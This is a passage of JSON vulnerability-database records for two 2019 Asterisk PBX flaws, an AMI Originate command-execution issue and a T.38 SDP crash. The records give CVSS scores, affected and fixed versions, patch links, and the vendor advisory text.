"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-18610"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "gjoseph",
"sources": [
{
"db": "PACKETSTORM",
"id": "155435"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1290"
}
],
"trust": 0.7
},
"cve": "CVE-2019-18610",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 9.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2019-18610",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "CNVD-2020-03060",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-18610",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2019-18610",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2020-03060",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201911-1290",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-03060"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012584"
},
{
"db": "NVD",
"id": "CVE-2019-18610"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1290"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered in manager.c in Sangoma Asterisk through 13.x, 16.x, 17.x and Certified Asterisk 13.21 through 13.21-cert4. A remote authenticated Asterisk Manager Interface (AMI) user without system authorization could use a specially crafted Originate AMI request to execute arbitrary system commands. Refer to the vendor information and take appropriate measures. Sangoma Technologies Asterisk is an open source telephone exchange (PBX) system software. The software supports voice mail, multi-party voice conferencing, interactive voice response (IVR), and more. \n\n Affected Versions \n Product Release \n Series \n Asterisk Open Source 13.x All releases \n Asterisk Open Source 16.x All releases \n Asterisk Open Source 17.x All releases \n Certified Asterisk 13.21 All releases \n\n Corrected In \n Product Release \n Asterisk Open Source 13.29.2 \n Asterisk Open Source 16.6.2 \n Asterisk Open Source 17.0.1 \n Certified Asterisk 13.21-cert5 \n\n Patches \n SVN URL Revision \n http://downloads.asterisk.org/pub/security/AST-2019-007-13.diff Asterisk 13 \n http://downloads.asterisk.org/pub/security/AST-2019-007-16.diff Asterisk 16 \n http://downloads.asterisk.org/pub/security/AST-2019-007-17.diff Asterisk 17 \n http://downloads.asterisk.org/pub/security/AST-2019-007-13.21.diff Certified \n Asterisk \n 13.21-cert5 \n\n Links https://issues.asterisk.org/jira/browse/ASTERISK-28580 \n\n Asterisk Project Security Advisories are posted at \n http://www.asterisk.org/security \n \n This document may be superseded by later versions; if so, the latest \n version will be posted at \n http://downloads.digium.com/pub/security/AST-2019-007.pdf and \n http://downloads.digium.com/pub/security/AST-2019-007.html \n\n Revision History\n Date Editor Revisions Made \n October 24, 2019 George Joseph Initial Revision \n November 21, 2019 Ben Ford Added \u201cPosted On\u201d date \n\n Asterisk Project Security Advisory - AST-2019-007\n Copyright \u00a9 2019 Digium, Inc. All Rights Reserved. \n Permission is hereby granted to distribute and publish this advisory in its\n original, unaltered form",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-18610"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012584"
},
{
"db": "CNVD",
"id": "CNVD-2020-03060"
},
{
"db": "PACKETSTORM",
"id": "155435"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-18610",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012584",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "155435",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2020-03060",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.4526",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.4421",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1290",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-03060"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012584"
},
{
"db": "PACKETSTORM",
"id": "155435"
},
{
"db": "NVD",
"id": "CVE-2019-18610"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1290"
}
]
},
"id": "VAR-201911-1169",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-03060"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-03060"
}
]
},
"last_update_date": "2023-12-18T12:27:54.873000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Advisories",
"trust": 0.8,
"url": "https://www.asterisk.org/downloads/security-advisories"
},
{
"title": "AST-2019-007",
"trust": 0.8,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-007.html"
},
{
"title": "[SECURITY] [DLA 2017-1] asterisk security update",
"trust": 0.8,
"url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00038.html"
},
{
"title": "Patch for Sangoma Technologies Asterisk and Sangoma Technologies Certified Asterisk Command Execution Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/196957"
},
{
"title": "Sangoma Technologies Asterisk and Sangoma Technologies Certified Asterisk Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=104055"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-03060"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012584"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1290"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-862",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-012584"
},
{
"db": "NVD",
"id": "CVE-2019-18610"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.2,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-007.html"
},
{
"trust": 1.6,
"url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00038.html"
},
{
"trust": 1.6,
"url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00001.html"
},
{
"trust": 1.6,
"url": "https://www.asterisk.org/downloads/security-advisories"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-18610"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-18610"
},
{
"trust": 0.6,
"url": "https://seclists.org/fulldisclosure/2019/nov/19"
},
{
"trust": 0.6,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-008.html"
},
{
"trust": 0.6,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-006.html"
},
{
"trust": 0.6,
"url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00038.html second message url unavailable at time of publishing"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/asterisk-privilege-escalation-via-ami-originate-request-30936"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.4526/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/155435/asterisk-project-security-advisory-ast-2019-007.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.4421/"
},
{
"trust": 0.1,
"url": "http://downloads.digium.com/pub/security/ast-2019-007.pdf"
},
{
"trust": 0.1,
"url": "http://downloads.digium.com/pub/security/ast-2019-007.html"
},
{
"trust": 0.1,
"url": "http://www.asterisk.org/security"
},
{
"trust": 0.1,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-007-13.diff"
},
{
"trust": 0.1,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-007-17.diff"
},
{
"trust": 0.1,
"url": "https://issues.asterisk.org/jira/browse/asterisk-28580"
},
{
"trust": 0.1,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-007-16.diff"
},
{
"trust": 0.1,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-007-13.21.diff"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-03060"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012584"
},
{
"db": "PACKETSTORM",
"id": "155435"
},
{
"db": "NVD",
"id": "CVE-2019-18610"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1290"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-03060"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012584"
},
{
"db": "PACKETSTORM",
"id": "155435"
},
{
"db": "NVD",
"id": "CVE-2019-18610"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1290"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-01-14T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-03060"
},
{
"date": "2019-12-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-012584"
},
{
"date": "2019-11-21T23:30:33",
"db": "PACKETSTORM",
"id": "155435"
},
{
"date": "2019-11-22T18:15:11.030000",
"db": "NVD",
"id": "CVE-2019-18610"
},
{
"date": "2019-11-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201911-1290"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-01-21T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-03060"
},
{
"date": "2019-12-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-012584"
},
{
"date": "2022-06-03T14:34:50.917000",
"db": "NVD",
"id": "CVE-2019-18610"
},
{
"date": "2022-04-06T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201911-1290"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "155435"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1290"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Sangoma Asterisk and Certified Asterisk Vulnerabilities related to lack of authentication",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-012584"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201911-1290"
}
],
"trust": 0.6
}
}
VAR-201911-1367
Vulnerability from variot - Updated: 2023-12-18 12:27An issue was discovered in res_pjsip_t38.c in Sangoma Asterisk through 13.x and Certified Asterisk through 13.21-x. If it receives a re-invite initiating T.38 faxing and has a port of 0 and no c line in the SDP, a NULL pointer dereference and crash will occur. This is different from CVE-2019-18940. This vulnerability CVE-CVE-2019-18940 Is a different vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. Sangoma Technologies Asterisk is an open source telephone exchange (PBX) system software. The software supports voicemail, multi-party voice conferencing, interactive voice response (IVR), and more. The vulnerability originates from improper design or implementation during code development of a network system or product. An attacker could use this vulnerability to execute malicious code. Asterisk Project Security Advisory -
Product Asterisk
Summary Re-invite with T.38 and malformed SDP causes crash.
Nature of Advisory Remote Crash
Susceptibility Remote Authenticated Sessions
Severity Minor
Exploits Known No
Reported On November 07, 2019
Reported By Salah Ahmed
Posted On November 21, 2019
Last Updated On November 21, 2019
Advisory Contact bford AT sangoma DOT com
CVE Name CVE-2019-18976
Description If Asterisk receives a re-invite initiating T.38
faxing and has a port of 0 and no c line in the SDP, a
crash will occur.
Modules Affected res_pjsip_t38.c
Resolution If T.38 faxing is not needed, then the “t38_udptl”
configuration option in pjsip.conf can be set to “no” to
disable the functionality. This option automatically
defaults to “no” and would have to be manually turned on to
experience this crash.
If T.38 faxing is needed, then Asterisk should be upgraded
to a fixed version.
Affected Versions
Product Release
Series
Asterisk Open Source 13.x All versions
Certified Asterisk 13.21 All versions
Corrected In
Product Release
Asterisk Open Source 13.29.2
Certified Asterisk 13.21-cert5
Patches
SVN URL Revision
http://downloads.asterisk.org/pub/security/AST-2019-008-13.diff Asterisk 13
http://downloads.asterisk.org/pub/security/AST-2019-008-13.21.diff Certified
Asterisk
13.21-cert5
Links https://issues.asterisk.org/jira/browse/ASTERISK-28612
Asterisk Project Security Advisories are posted at
http://www.asterisk.org/security
This document may be superseded by later versions; if so, the latest
version will be posted at http://downloads.digium.com/pub/security/.pdf
and http://downloads.digium.com/pub/security/.html
Revision History
Date Editor Revisions Made
November 12, 2019 Ben Ford Initial Revision
November 21, 2019 Ben Ford Added “Posted On” date
Asterisk Project Security Advisory -
Copyright © 2019 Digium, Inc. All Rights Reserved.
Permission is hereby granted to distribute and publish this advisory in its original, unaltered form
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201911-1367",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "asterisk",
"scope": "gte",
"trust": 1.0,
"vendor": "digium",
"version": "13.0.0"
},
{
"model": "certified asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "digium",
"version": "13.21"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "9.0"
},
{
"model": "asterisk",
"scope": "lte",
"trust": 1.0,
"vendor": "digium",
"version": "13.29.1"
},
{
"model": "asterisk",
"scope": "lte",
"trust": 0.8,
"vendor": "digium",
"version": "13.x"
},
{
"model": "certified asterisk",
"scope": "lte",
"trust": 0.8,
"vendor": "digium",
"version": "13.21-x"
},
{
"model": "asterisk",
"scope": "lte",
"trust": 0.6,
"vendor": "sangoma",
"version": "\u003c=13.*"
},
{
"model": "certified asterisk",
"scope": "lte",
"trust": 0.6,
"vendor": "sangoma",
"version": "\u003c=13.21-*"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-01312"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012748"
},
{
"db": "NVD",
"id": "CVE-2019-18976"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:digium:certified_asterisk:13.21:cert1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:certified_asterisk:13.21:cert2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:certified_asterisk:13.21:cert3:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:certified_asterisk:13.21:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:certified_asterisk:13.21:cert4:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "13.29.1",
"versionStartIncluding": "13.0.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-18976"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "bford",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201911-1292"
}
],
"trust": 0.6
},
"cve": "CVE-2019-18976",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 5.0,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2019-18976",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CNVD-2020-01312",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2019-18976",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2019-18976",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2020-01312",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201911-1292",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-01312"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012748"
},
{
"db": "NVD",
"id": "CVE-2019-18976"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1292"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered in res_pjsip_t38.c in Sangoma Asterisk through 13.x and Certified Asterisk through 13.21-x. If it receives a re-invite initiating T.38 faxing and has a port of 0 and no c line in the SDP, a NULL pointer dereference and crash will occur. This is different from CVE-2019-18940. This vulnerability CVE-CVE-2019-18940 Is a different vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. Sangoma Technologies Asterisk is an open source telephone exchange (PBX) system software. The software supports voicemail, multi-party voice conferencing, interactive voice response (IVR), and more. The vulnerability originates from improper design or implementation during code development of a network system or product. An attacker could use this vulnerability to execute malicious code. Asterisk Project Security Advisory -\n\n Product Asterisk \n Summary Re-invite with T.38 and malformed SDP causes crash. \n Nature of Advisory Remote Crash \n Susceptibility Remote Authenticated Sessions \n Severity Minor \n Exploits Known No \n Reported On November 07, 2019 \n Reported By Salah Ahmed \n Posted On November 21, 2019 \n Last Updated On November 21, 2019 \n Advisory Contact bford AT sangoma DOT com \n CVE Name CVE-2019-18976 \n\n Description If Asterisk receives a re-invite initiating T.38 \n faxing and has a port of 0 and no c line in the SDP, a \n crash will occur. \n Modules Affected res_pjsip_t38.c \n\n Resolution If T.38 faxing is not needed, then the \u201ct38_udptl\u201d \n configuration option in pjsip.conf can be set to \u201cno\u201d to \n disable the functionality. This option automatically \n defaults to \u201cno\u201d and would have to be manually turned on to \n experience this crash. \n \n If T.38 faxing is needed, then Asterisk should be upgraded \n to a fixed version. \n\n Affected Versions \n Product Release \n Series \n Asterisk Open Source 13.x All versions \n Certified Asterisk 13.21 All versions \n\n Corrected In \n Product Release \n Asterisk Open Source 13.29.2 \n Certified Asterisk 13.21-cert5 \n\n Patches \n SVN URL Revision \n http://downloads.asterisk.org/pub/security/AST-2019-008-13.diff Asterisk 13 \n http://downloads.asterisk.org/pub/security/AST-2019-008-13.21.diff Certified \n Asterisk \n 13.21-cert5 \n\n Links https://issues.asterisk.org/jira/browse/ASTERISK-28612 \n\n Asterisk Project Security Advisories are posted at \n http://www.asterisk.org/security \n \n This document may be superseded by later versions; if so, the latest \n version will be posted at http://downloads.digium.com/pub/security/.pdf \n and http://downloads.digium.com/pub/security/.html \n\n Revision History\n Date Editor Revisions Made \n November 12, 2019 Ben Ford Initial Revision \n November 21, 2019 Ben Ford Added \u201cPosted On\u201d date \n\n Asterisk Project Security Advisory -\n Copyright \u00a9 2019 Digium, Inc. All Rights Reserved. \n Permission is hereby granted to distribute and publish this advisory in its\n original, unaltered form",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-18976"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012748"
},
{
"db": "CNVD",
"id": "CNVD-2020-01312"
},
{
"db": "PACKETSTORM",
"id": "155436"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-18976",
"trust": 3.1
},
{
"db": "PACKETSTORM",
"id": "155436",
"trust": 1.7
},
{
"db": "CS-HELP",
